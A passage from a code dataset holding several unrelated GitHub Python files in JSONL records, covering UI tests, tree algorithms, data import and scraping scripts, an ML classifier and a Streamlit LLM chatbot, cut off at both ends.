\"LastKeyDownValue\")\n last_key_press = self.altdriver.find_object(By.NAME, \"LastKeyPressedValue\")\n\n assert last_key_down.get_text() == \"97\"\n assert last_key_press.get_text() == \"97\"\n\n self.altdriver.key_up(AltKeyCode.A)\n last_key_up = self.altdriver.find_object(By.NAME, \"LastKeyUpValue\")\n\n assert last_key_up.get_text() == \"97\"\n","repo_name":"alttester/AltTester-Unity-SDK","sub_path":"Bindings~/python/tests/integration/test_scene05.py","file_name":"test_scene05.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"44"} +{"seq_id":"14754026957","text":"import collections\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n 
self.left, self.right = None, None\n\n\nclass Solution: # 48ms\n def invertTree(self, root: TreeNode) -> TreeNode:\n \"\"\"\n 关键在哪呢??先翻转,再遍历每个节点。\n \"\"\"\n # 001 terminator\n if root is None:\n return None\n # 002 handle current level\n root.left, root.right = root.right, root.left\n # 003 dril down\n self.invertTree(root.left)\n self.invertTree(root.right)\n # 004 restore current level status\n return root\n\n\nclass Solution1: # 44ms\n def invertTree(self, root: TreeNode) -> TreeNode:\n # node= root\n stack = [root]\n while stack:\n node = stack.pop()\n if node:\n node.left, node.right = node.right, node.left\n stack.append(node.right)\n stack.append(node.left)\n return root\n\n # recursively\n def invertTree1(self, root):\n if root:\n root.left, root.right = self.invertTree(root.right), self.invertTree(root.left)\n return root\n\n # BFS\n def invertTree2(self, root):\n queue = collections.deque([(root)])\n while queue:\n node = queue.popleft()\n if node:\n node.left, node.right = node.right, node.left # 变量引用对象,本质上是对象的调换。\n queue.append(node.left)\n queue.append(node.right)\n return root\n\n # DFS\n def invertTree3(self, root):\n stack = [root]\n while stack:\n node = stack.pop()\n if node:\n node.left, node.right = node.right, node.left # 做选择\n stack.extend([node.right, node.left]) # 可以更换添加顺序。不一定非要左右,右左遍历一样可以。\n return root\n","repo_name":"1530426574/practices-of-Data-Structures-and-Algorithms","sub_path":"泛型递归-树的递归/226. 翻转二叉树.py","file_name":"226. 翻转二叉树.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"74185456454","text":"import datetime\nimport decimal\nimport logging\nimport math\nimport os\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError\n\nfrom geo_ez.models import PostalCode, TimeZone, TimeZoneMap\nfrom geo_ez.python3_compatibility import compatible_urlretrieve\nfrom geo_ez.utility_functions import csv_to_dicts\n\nlogger = logging.getLogger(__name__)\n\nsettings.DEBUG = False\n\ncountries = [\"US\", \"AS\", \"GU\", \"MP\", \"PR\", \"VI\", \"AZ\"]\n\ninsert_threshold = getattr(settings, \"INSERT_THRESHOLD\", 10000)\ndata_dir = getattr(settings, \"DATA_DIR\", os.path.join(settings.MEDIA_ROOT, \"DATA\"))\n\n\nclass Command(BaseCommand):\n help = \"Import Postal Codes from GeoNames.\"\n verbosity = 0\n current_file = None\n log_file_name = None\n log_file = False\n\n init_time = None\n existing_drug_list = []\n drug_insert_list = []\n\n # def add_arguments(self, parser):\n # parser.add_argument(\"address\", type=str)\n\n def _log_message(self, message):\n log_message = \"%s: %s\\n\" % (datetime.datetime.now().isoformat()[0:19], message)\n\n logger.info(message)\n\n if self.verbosity > 0:\n self.stdout.write(log_message)\n\n def _timer(self):\n if not self.init_time:\n self.init_time = datetime.datetime.now()\n self._log_message(\"Command initiated.\")\n else:\n self._log_message(\"Command completed.\")\n\n complete_time = datetime.datetime.now()\n command_total_seconds = (complete_time - self.init_time).total_seconds()\n command_minutes = math.floor(command_total_seconds / 60)\n command_seconds = command_total_seconds - (command_minutes * 60)\n\n self._log_message(\"Command took %i minutes and %i seconds to run.\" % (command_minutes, command_seconds))\n\n def handle(self, *args, **options):\n self.verbosity = int(options[\"verbosity\"])\n\n self._timer()\n\n countries = 
sorted(list(set(list(PostalCode.objects.all().values_list(\"country_code\", flat=True)))))\n\n self._log_message(\"Processing: %s\" % \",\".join(countries))\n\n import_filename = \"timeZones.txt\"\n import_file_path = os.path.join(data_dir, \"geonames\")\n import_file = os.path.join(import_file_path, import_filename)\n\n if not os.path.exists(import_file_path):\n os.makedirs(import_file_path)\n\n if os.path.exists(import_file):\n os.remove(import_file)\n\n compatible_urlretrieve(\"http://download.geonames.org/export/dump/%s\" % import_filename, import_file)\n\n rows = csv_to_dicts(import_file, delimiter=\"\\t\")\n\n for row in rows:\n country_code = row.get(\"CountryCode\")\n timezone_id = row.get(\"TimeZoneId\")\n gmt_offset_jan = float(row.get(\"GMT offset 1. Jan 2019\"))\n gmt_offset_jul = float(row.get(\"DST offset 1. Jul 2019\"))\n raw_offset = float(row.get(\"rawOffset (independant of DST)\"))\n\n if country_code in countries:\n try:\n time_zone = TimeZone.objects.get(timezone_id=timezone_id)\n\n except TimeZone.DoesNotExist:\n time_zone = TimeZone.objects.create(\n country_code=country_code,\n timezone_id=timezone_id,\n gmt_offset_jan=gmt_offset_jan,\n gmt_offset_jul=gmt_offset_jul,\n raw_offset=raw_offset,\n )\n else:\n time_zone.country_code = country_code\n time_zone.timezone_id = timezone_id\n time_zone.gmt_offset_jan = gmt_offset_jan\n time_zone.gmt_offset_jul = gmt_offset_jul\n time_zone.raw_offset = raw_offset\n\n time_zone.save()\n\n ztz_import_filename = \"tz.data\"\n ztz_import_file = os.path.join(import_file_path, import_filename)\n\n if os.path.exists(ztz_import_file):\n os.remove(ztz_import_file)\n\n compatible_urlretrieve(\n \"https://raw.githubusercontent.com/infused/ziptz/master/data/%s\" % ztz_import_filename, ztz_import_file\n )\n\n ztz_headers = [\"zip_code\", \"timezone_id\"]\n\n ztz_rows = csv_to_dicts(ztz_import_file, delimiter=\"=\", fieldnames=ztz_headers)\n\n for ztz_row in ztz_rows:\n zipcode = ztz_row.get(\"zip_code\")\n timezone_id = ztz_row.get(\"timezone_id\")\n\n if \"APO\" not in timezone_id and \"FPO\" not in timezone_id:\n try:\n tz_map = TimeZoneMap.objects.get(zip_code=zipcode)\n except TimeZoneMap.DoesNotExist:\n try:\n tz_map = TimeZoneMap.objects.create(zip_code=zipcode, time_zone_id=timezone_id)\n except IntegrityError as e:\n self._log_message(e)\n else:\n tz_map.zip_code = zipcode\n tz_map.time_zone_id = timezone_id\n tz_map.save()\n\n self._timer()\n","repo_name":"avryhof/geo_ez","sub_path":"geo_ez/management/commands/import-timezone-data.py","file_name":"import-timezone-data.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17061441618","text":"import pandas as pd\nimport numpy as np\n\n# Import the data\nRAW = pd.read_csv(\"output.csv\")\n\n# prep the data\nylist = RAW['koi_disposition'].to_list()\ny = np.array(ylist)\n\nXdf = RAW.drop(columns=['koi_disposition'])\nxnplist = [np.array(xi) for xi in Xdf.values]\nX = np.stack(xnplist)\n\n\n\n# Intialize the classifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier, VotingClassifier\nfrom sklearn import svm\n\nclf1 = LogisticRegression(max_iter = 1000,random_state=1)\nclf2 = RandomForestClassifier(n_estimators=50, random_state=1)\nclf3 = GaussianNB()\nclf4 = svm.SVC(probability = True)\n\neclf1 = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3), ('svm', clf4)], 
voting='soft')\n\n\n\n# Train and evaluate the classifier\nfrom sklearn.metrics import classification_report, confusion_matrix, f1_score, accuracy_score\nfrom sklearn.model_selection import KFold\n\nkf = KFold(n_splits=5, random_state=0, shuffle = True)\n\navgs = []\nmacrof1s = []\nmicrof1s = []\nweightedf1s = []\ntps = []\nfps = []\nfns = []\ntns = []\n\n\nfor train_index, test_index in kf.split(X, y):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n \n eclf1 = eclf1.fit(X_train, y_train)\n \n y_pred = eclf1.predict(X_test)\n avgs.append(accuracy_score(y_test, y_pred))\n macrof1s.append(f1_score(y_test, y_pred, average='macro'))\n microf1s.append(f1_score(y_test, y_pred, average='micro'))\n weightedf1s.append(f1_score(y_test, y_pred, average='weighted'))\n tps.append(confusion_matrix(y_test, y_pred)[0][0])\n fps.append(confusion_matrix(y_test, y_pred)[0][1])\n fns.append(confusion_matrix(y_test, y_pred)[1][0])\n tns.append(confusion_matrix(y_test, y_pred)[1][1])\n \n \n\nprint(\"average Accuracy: \" + str(sum(avgs)/len(avgs)))\nprint(\"average Macro F1 Score: \" + str(sum(macrof1s)/len(avgs)))\nprint(\"average Micro F1 Score: \" + str(sum(microf1s)/len(avgs)))\nprint(\"average weighted F1 Score: \" + str(sum(weightedf1s)/len(avgs)))\nprint(\"average number of true positive rate: \" + str(sum(tps)/len(avgs)))\nprint(\"average number of false positives: \" + str(sum(fps)/len(avgs)))\nprint(\"average number of true negatives: \" + str(sum(fns)/len(avgs)))\nprint(\"average number of true negatives: \" + str(sum(tns)/len(avgs)))","repo_name":"paganflamingo/cse575_proj_data","sub_path":"Code to submit/VotingClassifier.py","file_name":"VotingClassifier.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4211855001","text":"import reqon.deprecated as reqon\nimport unittest\nimport pytest\n\nclass TestQuery(unittest.TestCase):\n def test_query(self):\n query = {\n \"$table\": \"foo\",\n \"$query\": [\n [\"$get\", \"foo\"]\n ]\n }\n\n assert str(reqon.query(query)) == \"r.table('foo').get('foo')\"\n\n def test_invalid_query(self):\n with pytest.raises(reqon.exceptions.ReqonError):\n reqon.query({\"$schema\": \"foo\"})\n","repo_name":"dmpayton/reqon","sub_path":"tests/deprecated/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"30452479600","text":"import ctranslate2\nimport requests\nimport streamlit as st\n\nimport nvidia\nimport os\nimport time\nimport torch\nimport transformers\n\nfrom random import randint\nfrom streamlit.web.server import websocket_headers\nfrom streamlit_chat import message\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, GenerationConfig\n\n\n#Generate the output from the LLM\n# def generate(prompt: str = None, new_tokens: int = 200):\ndef generate(prompt: str = None, pct_new_tokens: float = 1.2):\n if prompt is None:\n return 'Please provide a prompt.'\n \n # Construct the prompt for the model\n user_input = prompt_template.format(dialogue=prompt)\n \n tokens_per_sec = 0\n start_time = time.perf_counter()\n tokens = tokenizer.convert_ids_to_tokens(tokenizer.encode(user_input))\n input_length = len(tokens)\n # new_tokens = round(pct_new_tokens*input_length)\n new_tokens = 400\n tokens_per_sec = 0\n start_time = time.time()\n results = 
generator.generate_batch([tokens], sampling_topk=5, max_length=new_tokens, include_prompt_in_result=False)\n end_time = time.time()\n output_text = tokenizer.decode(results[0].sequences_ids[0])\n tokens_per_sec = round(new_tokens / (end_time - start_time),3)\n \n# gen_text = pipe_llama7b_chat(user_input)\n \n# input_ids = tokenizer(user_input, return_tensors=\"pt\").input_ids\n# input_ids = input_ids.to('cuda')\n\n# generation_config = GenerationConfig(\n# pad_token_id=tokenizer.pad_token_id,\n# max_new_tokens = new_tokens\n# )\n\n# with torch.no_grad():\n# generated_ids = generator.generate(input_ids, generation_config=generation_config)\n \n# gen_text = tokenizer.batch_decode(generated_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)[0]\n# end_time = time.perf_counter()\n# gen_text = gen_text.replace(f\"[INST] {prompt} [/INST]\", '')\n\n return {'text_from_llm': output_text, 'tokens_per_sec': tokens_per_sec}\n \n \ncuda_install_dir = '/'.join(nvidia.__file__.split('/')[:-1]) + '/cuda_runtime/lib/'\nos.environ['LD_LIBRARY_PATH'] = cuda_install_dir\n\n\n# Load the model\nmodel_path = '/mnt/data/llama2-ct'\nmodel_device = 'cuda' if torch.cuda.is_available() else 'cpu'\n# model_device = 'cpu'\n\n# load the ctranslate model\ntry: generator\nexcept NameError: \n generator = ctranslate2.Generator(model_path, device=model_device)\n\ntry: tokenizer\nexcept NameError:\n tokenizer = transformers.AutoTokenizer.from_pretrained('subirmansukhani/llama-2-7b-miniguanaco')\n\n# generator = ctranslate2.Generator(model_path, device=model_device)\n# tokenizer = transformers.AutoTokenizer.from_pretrained('subirmansukhani/llama-2-7b-miniguanaco')\n\n\n# load the Huggingface model\n# Reload model in FP16 and merge it with LoRA weights\n# generator = AutoModelForCausalLM.from_pretrained(model_path,\n# low_cpu_mem_usage=True,\n# return_dict=True,\n# cache_dir=\"/mnt/artifacts/llama2-model-cache/\",\n# torch_dtype=torch.float16,\n# device_map='auto',\n# )\n# load the tokenizer\n# tokenizer = transformers.AutoTokenizer.from_pretrained(model_path)\n\n# pipe_llama7b_chat = pipeline(task=\"text-generation\", model=generator, tokenizer=tokenizer, max_length=200, return_full_text=False) \n\nprompt_template = f\"[INST] {{dialogue}} [/INST]\"\n\n\n# Initialise session state variables\nif 'generated' not in st.session_state:\n st.session_state['generated'] = []\nif 'past' not in st.session_state:\n st.session_state['past'] = []\nif 'messages' not in st.session_state:\n st.session_state['messages'] = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"}\n ]\nif 'tokens_sec' not in st.session_state:\n st.session_state['tokens_sec'] = []\n\n\nst.set_page_config(initial_sidebar_state='collapsed')\nclear_button = st.sidebar.button(\"Clear Conversation\", key=\"clear\")\n \n\n\nif clear_button:\n st.session_state['generated'] = []\n st.session_state['past'] = []\n st.session_state['tokens_sec'] = []\n st.session_state['messages'] = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"}\n ]\n\n\n# container for chat history\nresponse_container = st.container()\n# container for text box\ncontainer = st.container()\n\nwith container:\n with st.form(key='my_form', clear_on_submit=True):\n user_input = st.text_area(\"You:\", key='input', height=150)\n submit_button = st.form_submit_button(label='Send')\n tokens_sec = 0\n if submit_button and user_input :\n with st.spinner(\"Generating response\"):\n prompt = prompt_template.format(dialogue=user_input)\n llm_response = 
generate(prompt)\n answer = llm_response['text_from_llm']\n tokens_sec = llm_response['tokens_per_sec']\n \n st.session_state['past'].append(user_input)\n st.session_state['generated'].append(answer)\n st.session_state['tokens_sec'].append(tokens_sec)\n \n if st.session_state['generated']:\n with response_container:\n for i in range(len(st.session_state['generated'])):\n message(st.session_state[\"past\"][i], is_user=True,logo='https://freesvg.org/img/1367934593.png', key=str(i) + '_user')\n message(st.session_state[\"generated\"][i], logo='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQk6e8aarUy37BOHMTSk-TUcs4AyAy3pfAHL-F2K49KHNEbI0QUlqWJFEqXYQvlBdYMMJA&usqp=CAU', key=str(i))\n # st.write(f\"Tokens generated per sec: {st.session_state['tokens_sec'][i]}\")\n","repo_name":"ddl-subir-m/llama2-sft-chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6923299767","text":"#coding:UTF-8\nfrom PIL import Image\ndef ImageToMatrix(filename):\n # 读取图片\n im = Image.open(filename)\n # 显示图片\n# im.show()\n width,height = im.size\n im = im.convert(\"L\")\n data = im.getdata()\n data = np.matrix(data,dtype='float')/255.0\n new_data = np.reshape(data,(width,height))\n return new_data\n# new_im = Image.fromarray(new_data)\n# # 显示图片\n# new_im.show()\ndef MatrixToImage(data):\n data = data*255\n new_im = Image.fromarray(data.astype(np.uint8))\n return new_im","repo_name":"changtingwai/cnn_project","sub_path":"keras_conv_nn.py","file_name":"keras_conv_nn.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71243062533","text":"# %%\n# Libraries\nimport datetime as dt\nimport pandas as pd\nimport requests\nimport json\nimport os.path\nimport os\nimport time\nimport tqdm\nfrom datetimerange import DateTimeRange\nfrom Database_Manager import MySQLStationManagerAWS\nfrom BluetoothStation import *\n# %%\n# URL to request vehicle detection in Bluetooth Stations\ndata_url = \"https://mobility.api.opendatahub.bz.it/v2/flat%2Cnode/BluetoothStation/%2A/{}/{}?limit=-1&distinct=true&timezone=UTC\"\ndata_format = \"{}-{}-{}T{}%3A{}%3A{}.000%2B0000\" # YYYY-mm-ddTHH:MM:SS\n\n# %%\n# Get data from sdate to edate, with the possibility of saving data inside filename\ndef get_data_of_day(url, sdate, edate, filename=None):\n try:\n req = requests.get(url.format(data_format.format(sdate.year, \n sdate.strftime(\"%m\"), \n sdate.strftime(\"%d\"),\n sdate.strftime(\"%H\"),\n sdate.strftime(\"%M\"),\n sdate.strftime(\"%S\")),\n data_format.format(edate.year,\n edate.strftime(\"%m\"),\n edate.strftime(\"%d\"),\n edate.strftime(\"%H\"),\n edate.strftime(\"%M\"),\n edate.strftime(\"%S\"))))\n \n day_data = req.json()[\"data\"]\n results = from_json_to_list(day_data)\n headers = [\"Timestamp\", \"Count\", \"Station\"]\n df = pd.DataFrame(results, columns=headers).groupby(['Timestamp','Station'],as_index=False).sum().reset_index().drop('index',axis=1)\n df = df.reindex(columns=headers)\n return df\n except ValueError:\n # Possible error of gateway, retry after 1 minute\n print(\"Gateway Time-out error\")\n time.sleep(60)\n get_data_of_day(url, sdate, edate, filename)\n \n# Convert json data to list with timestamp, count and station\ndef from_json_to_list(json_data: json):\n result = []\n for element in json_data:\n if element['tname'] == \"Bluetooth Count record\" and element['ttype'] 
== 'Count':\n m = [dt.datetime.strptime(element['mvalidtime'][:19], '%Y-%m-%d %H:%M:%S'),\n element['mvalue'],\n element['sname']]\n result.append(m)\n return result\n# %%\n# Starting from the latest timestamp available inside the db, it gathers data\ndef get_missing_data(url=data_url, data_path = 'data/latest_data.csv'):\n # Manager to communicate with MySQL on EC2\n db = MySQLStationManagerAWS()\n \n # Datetime of the last data gathered\n last_date = db.get_latest_datetime()\n print(\"Last time you downloaded: \"+str(last_date))\n \n try:\n # Creating date range from last time we updated the db till now\n date_range = DateTimeRange(last_date+dt.timedelta(minutes=1),\n dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n date_range = [value for value in date_range.range(dt.timedelta(hours=1))]\n except:\n print(\"Too early to download data.\")\n sys.exit(0)\n # Get data for each hour\n for i in tqdm.trange(len(date_range)-1):\n sdate = date_range[i]\n edate = date_range[i+1]\n \n # Downloading data and saving it in pickle format\n msmt = get_data_of_day(url, sdate, edate)\n \n # saves data in a temporary csv\n if i==0:\n msmt.to_csv(data_path, mode = 'w', header=True, index=False)\n else:\n msmt.to_csv(data_path, mode='a', header=False, index=False) \n\n # Inserting data from csv inside the database \n print(\"Inserting data inside the database...\")\n db.insert_csv_in_db(data_path)\n print(\"Done.\")\n \n # Erasing the content inside latest_data.csv\n with open(data_path,\"w\") as f:\n f.truncate()\n \n# %%\nget_missing_data()","repo_name":"auroramariatumminello/Traffic-Project","sub_path":"py/download_real_time.py","file_name":"download_real_time.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73567947014","text":"# EXTRACTING LAT AND LNG DATA FROM THE DRIVER TRACKING BQ TABLE HIT THE VEHICLE AND TARIFF API ENDPOINTS, INGEST THE DATA IN BQ TABLE.\n\nimport time\nimport requests\nfrom pytz import timezone\nfrom datetime import datetime\nfrom google.cloud import bigquery\n\n# Initialize the BigQuery client\nclient = bigquery.Client()\n\ndef fetch_data_from_url(url):\n headers = {\n \"Authorization\": \"XXXXX\",\n \"Content-Type\": \"application/json\"\n }\n\n try:\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n response_date=response.json()\n # Convert current datetime to West African Time (WAT)\n nigerian_tz = timezone('Africa/Lagos')\n current_date = datetime.now(nigerian_tz).date().isoformat()\n response_date['data_date'] = current_date\n return response_date\n except requests.exceptions.RequestException as e:\n print(f\"API request error: {e}\")\n return None\n\ndef fetch_vehicle_data(lat, lng):\n api_url = \"https://api.aggregator.app/dispatch/v1/vehicle\"\n url = f\"{api_url}?origin={lat},{lng}\"\n return fetch_data_from_url(url)\n\ndef fetch_tariff_data(lat, lng):\n api_url = \"https://api.aggregator.app/dispatch/v1/tariff\"\n url = f\"{api_url}?origin={lat},{lng}\"\n return fetch_data_from_url(url)\n\n# Define your BigQuery table and dataset information\nproject_id = 'XXXX-1330b'\ndataset_id = 'XXXX_test'\ntable_id = 'XXXX_raw_order_data_test'\n\n# Construct the SQL query to get distinct lat and lng values\nquery = f\"\"\"\n SELECT DISTINCT driverLocation.lat, driverLocation.lng\n FROM `{project_id}.{dataset_id}.{table_id}`\n WHERE DATE(data_date) = CURRENT_DATE();\n\"\"\"\n\n# Execute the query\nquery_job = client.query(query)\nresults = 
query_job.result()\n\n# Uncomment and indent this block to fetch and process data\nfor row in results:\n lat, lng = row.lat, row.lng\n vehicle_data = fetch_vehicle_data(lat, lng)\n tariff_data = fetch_tariff_data(lat, lng)\n\n # # Add rate limiting to avoid overloading the API\n # time.sleep(1) # Sleep for 1 second between API calls (adjust as needed)\n\n # Define your BigQuery dataset ID\n dataset_id = 'XXXX_test'\n\n # Define the BigQuery table names\n vehicle_table_name = \"vehicle\"\n tariff_table_name = \"tariff\"\n\n # Create or get the BigQuery dataset\n dataset_ref = client.dataset(dataset_id)\n\n vehicle_table_ref = dataset_ref.table(vehicle_table_name)\n tariff_table_ref = dataset_ref.table(tariff_table_name)\n\n try:\n \n client.insert_rows_json(vehicle_table_ref, [vehicle_data])\n client.insert_rows_json(tariff_table_ref, [tariff_data])\n except Exception as e:\n print(f\"Error inserting data: {e}\")","repo_name":"sanket151/bits-project","sub_path":"operating-code/vehicle-tariff.py","file_name":"vehicle-tariff.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35098593029","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 28 10:18:38 2020\r\n\r\n@author: linigodelacruz\r\n\"\"\"\r\nimport numpy as np\r\nfrom collections import defaultdict \r\nimport pandas as pd\r\nfrom tkinter import Tk\r\nfrom tkinter import filedialog\r\nfrom sys import exit\r\n\r\n\r\ndef merging_datasets(gene_name=None,datawithfitness=None,datawithgoterms=None,datawithinteractions=None):\r\n \"\"\"\r\n Function that allows filtering the fitness dataset from Constanzo 2016, with data from \r\n interactions and go terms , genewise. \r\n Inputs:\r\ngene_name= gene on which you want to know the data available , it should be introduced in capitals e.g. 
'BEM1'\r\ndata_interactions= here is a dataframe on the data on interactors for example we would like to merge with the fitness one to filtered it \r\ntype_of_interaction_selected=string containing the info of which dataset are we using to filter the fitness data e.g 'synthetic-lethals'\r\n Output: a dataframe with the merge information \r\n \"\"\"\r\n \r\n if gene_name==None:\r\n gene_name='BEM1' # do this gene as an example\r\n \r\n if datawithfitness == None:\r\n \r\n root = Tk()\r\n root.filename = filedialog.askopenfilename(title = \"choose your fitness dataset\",filetypes = ((\"excel files\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n filename_fitness=root.filename\r\n root.withdraw()\r\n \r\n if datawithgoterms == None:\r\n \r\n root = Tk()\r\n root.filename = filedialog.askopenfilename(title = \"choose your go terms dataset\",filetypes = ((\"excel files\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n filename_go=root.filename\r\n root.withdraw()\r\n \r\n if datawithinteractions== None:\r\n \r\n root = Tk()\r\n root.filename = filedialog.askopenfilename(title = \"choose your interaction type dataset\",filetypes = ((\"excel files\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n filename_interactors=root.filename\r\n root.withdraw()\r\n \r\n \r\n datawithfitness=pd.read_excel(filename_fitness)\r\n datawithfitness.columns=['query-allele-name','array-allele-name','score','p-value','query-fitness','array-fitness','double-fitness','double-fitness-std']\r\n \r\n datawithgoterms=pd.read_excel(filename_go)\r\n datawithgoterms.columns=['Gene','gene-id','go-aspect','go-term','go-id','feature-type' ]\r\n \r\n datawithinteractions=pd.read_excel(filename_interactors)\r\n datawithinteractions.columns=['Gene', 'Interactor', 'Assay', 'citation']\r\n \r\n \r\n data_fitness_sga=datawithfitness\r\n data_raw_slim_go=datawithgoterms\r\n \r\n \r\n \r\n \r\n merge_data=defaultdict(dict)\r\n \r\n interactors_gene_name=datawithinteractions[datawithinteractions['Gene']==gene_name]['Interactor'].unique()\r\n constanzo_data=datawithfitness[datawithfitness['query-allele-name']==gene_name.casefold()]['array-allele-name'].tolist()\r\n \r\n if len(constanzo_data)==0:\r\n \r\n constanzo_data=datawithfitness[datawithfitness['array-allele-name']==gene_name.casefold()]['query-allele-name'].tolist()\r\n \r\n if len(constanzo_data)==0:\r\n print('The specified interactors for', gene_name,'are not in the fitness dataset of Constanzo')\r\n exit()\r\n \r\n genes_to_analyze=[]\r\n for i in interactors_gene_name:\r\n if i.casefold() in constanzo_data:\r\n genes_to_analyze.append(i)\r\n \r\n \r\n filtered_genes=genes_to_analyze\r\n data_fitness_sga_subset=data_fitness_sga[data_fitness_sga['query-allele-name']==gene_name.casefold()]\r\n \r\n merge_data=defaultdict(dict)\r\n for i in np.arange(0,len(filtered_genes)):\r\n \r\n \r\n tmp=data_fitness_sga_subset[data_fitness_sga_subset['array-allele-name']==filtered_genes[i].casefold()]\r\n tmp.index=np.arange(0,len(tmp))\r\n if len(tmp)!=0:\r\n \r\n if tmp['query-fitness'].all() > 2 or tmp['array-fitness'].all() > 2 or tmp['double-fitness'].all() >2 : ## these are relative growth rates , so this is to avoid large numbers in the datasets, that are non -interpretable data\r\n tmp['query-fitness']=2\r\n tmp['array-fitness']=2\r\n tmp['double-fitness']=2\r\n \r\n merge_data['gene_name'][filtered_genes[i]]=gene_name\r\n merge_data['array_name'][filtered_genes[i]]=gene_name\r\n merge_data['query-gene'][filtered_genes[i]]=filtered_genes[i]\r\n 
merge_data['score'][filtered_genes[i]]=tmp['score'].tolist()[0]\r\n merge_data['p-value'][filtered_genes[i]]=tmp['p-value'].tolist()[0]\r\n merge_data['double-fitness'][filtered_genes[i]]=tmp['double-fitness'].tolist()[0]\r\n merge_data['array-fitness'][filtered_genes[i]]=tmp['array-fitness'].tolist()[0]\r\n merge_data['query-fitness'][filtered_genes[i]]=tmp['query-fitness'].tolist()[0]\r\n \r\n \r\n data_go=data_raw_slim_go[data_raw_slim_go['Gene']==filtered_genes[i]]\r\n \r\n \r\n else:\r\n \r\n tmp=data_fitness_sga_subset[data_fitness_sga_subset['query-allele-name']==filtered_genes[i].casefold()]\r\n tmp.index=np.arange(0,len(tmp))\r\n \r\n if tmp['query-fitness'].all() > 2 or tmp['array-fitness'].all() > 2 or tmp['double-fitness'].all() >2 : ## these are relative growth rates , so this is to avoid large numbers in the datasets, that are non -interpretable data\r\n tmp['query-fitness']=2\r\n tmp['array-fitness']=2\r\n tmp['double-fitness']=2\r\n \r\n merge_data['gene_name'][filtered_genes[i]]=gene_name\r\n merge_data['array_name'][filtered_genes[i]]=gene_name\r\n merge_data['query-gene'][filtered_genes[i]]=filtered_genes[i]\r\n merge_data['score'][filtered_genes[i]]=tmp['score'].tolist()[0]\r\n merge_data['p-value'][filtered_genes[i]]=tmp['p-value'].tolist()[0]\r\n merge_data['double-fitness'][filtered_genes[i]]=tmp['double-fitness'].tolist()[0]\r\n merge_data['array-fitness'][filtered_genes[i]]=tmp['array-fitness'].tolist()[0]\r\n merge_data['query-fitness'][filtered_genes[i]]=tmp['query-fitness'].tolist()[0]\r\n \r\n if len(data_go)==0:\r\n merge_data['go-term-filtered-gene'][filtered_genes[i]]='gene not found'\r\n else:\r\n merge_data['go-term-filtered-gene'][filtered_genes[i]]=data_go.iloc[:,3].tolist()\r\n \r\n \r\n \r\n \r\n merge_data_pd=pd.DataFrame(merge_data)\r\n merge_data_numeric=merge_data_pd[pd.to_numeric(merge_data_pd['score'] ,errors='coerce').notnull()]\r\n \r\n \r\n\r\n return merge_data_numeric\r\n\r\n\r\n","repo_name":"SATAY-LL/SATAY-DOWNSTREAM-ANALYSIS","sub_path":"src/python_modules/module_merging_fitness_with_interactions_and_go_terms.py","file_name":"module_merging_fitness_with_interactions_and_go_terms.py","file_ext":"py","file_size_in_byte":6630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12459744196","text":"#make a csv file of all stock tickers found on finwiz.com\n#this makes it easier to make lists that access all ticker symbols\nfrom bs4 import BeautifulSoup\nimport urllib.request\nfrom urllib.request import urlopen\nimport csv\nimport pandas as pd\nfrom pandas import DataFrame, read_csv\n\n\n#Save all of the ticker symbols onto an array and then save to a csv file\ndef make_tickers_csv():\n ticker_list = []\n page_number = 1\n page_numbers = []\n\n #make a number array to make iteration easier in the future\n for i in range(373):\n page_numbers.append(page_number)\n page_number += 20\n\n #iterate through the websites using beautifulsoup and urllib\n #this for loop creates the ticker array\n for number in page_numbers:\n #opens a certain page of tickers depending on the munber given in the number array\n url = 'https://finviz.com/screener.ashx?v=120&r={}'.format(number)\n url_opened = urlopen(url)\n soup = BeautifulSoup(url_opened, 'html.parser')\n\n #finds all of the tickers' links on the page\n #then deletes unnecessary information and adds it to the list \n for a in soup.find_all('a', class_ = 'screener-link-primary'):\n link_old = a.get('href')\n link_new = 
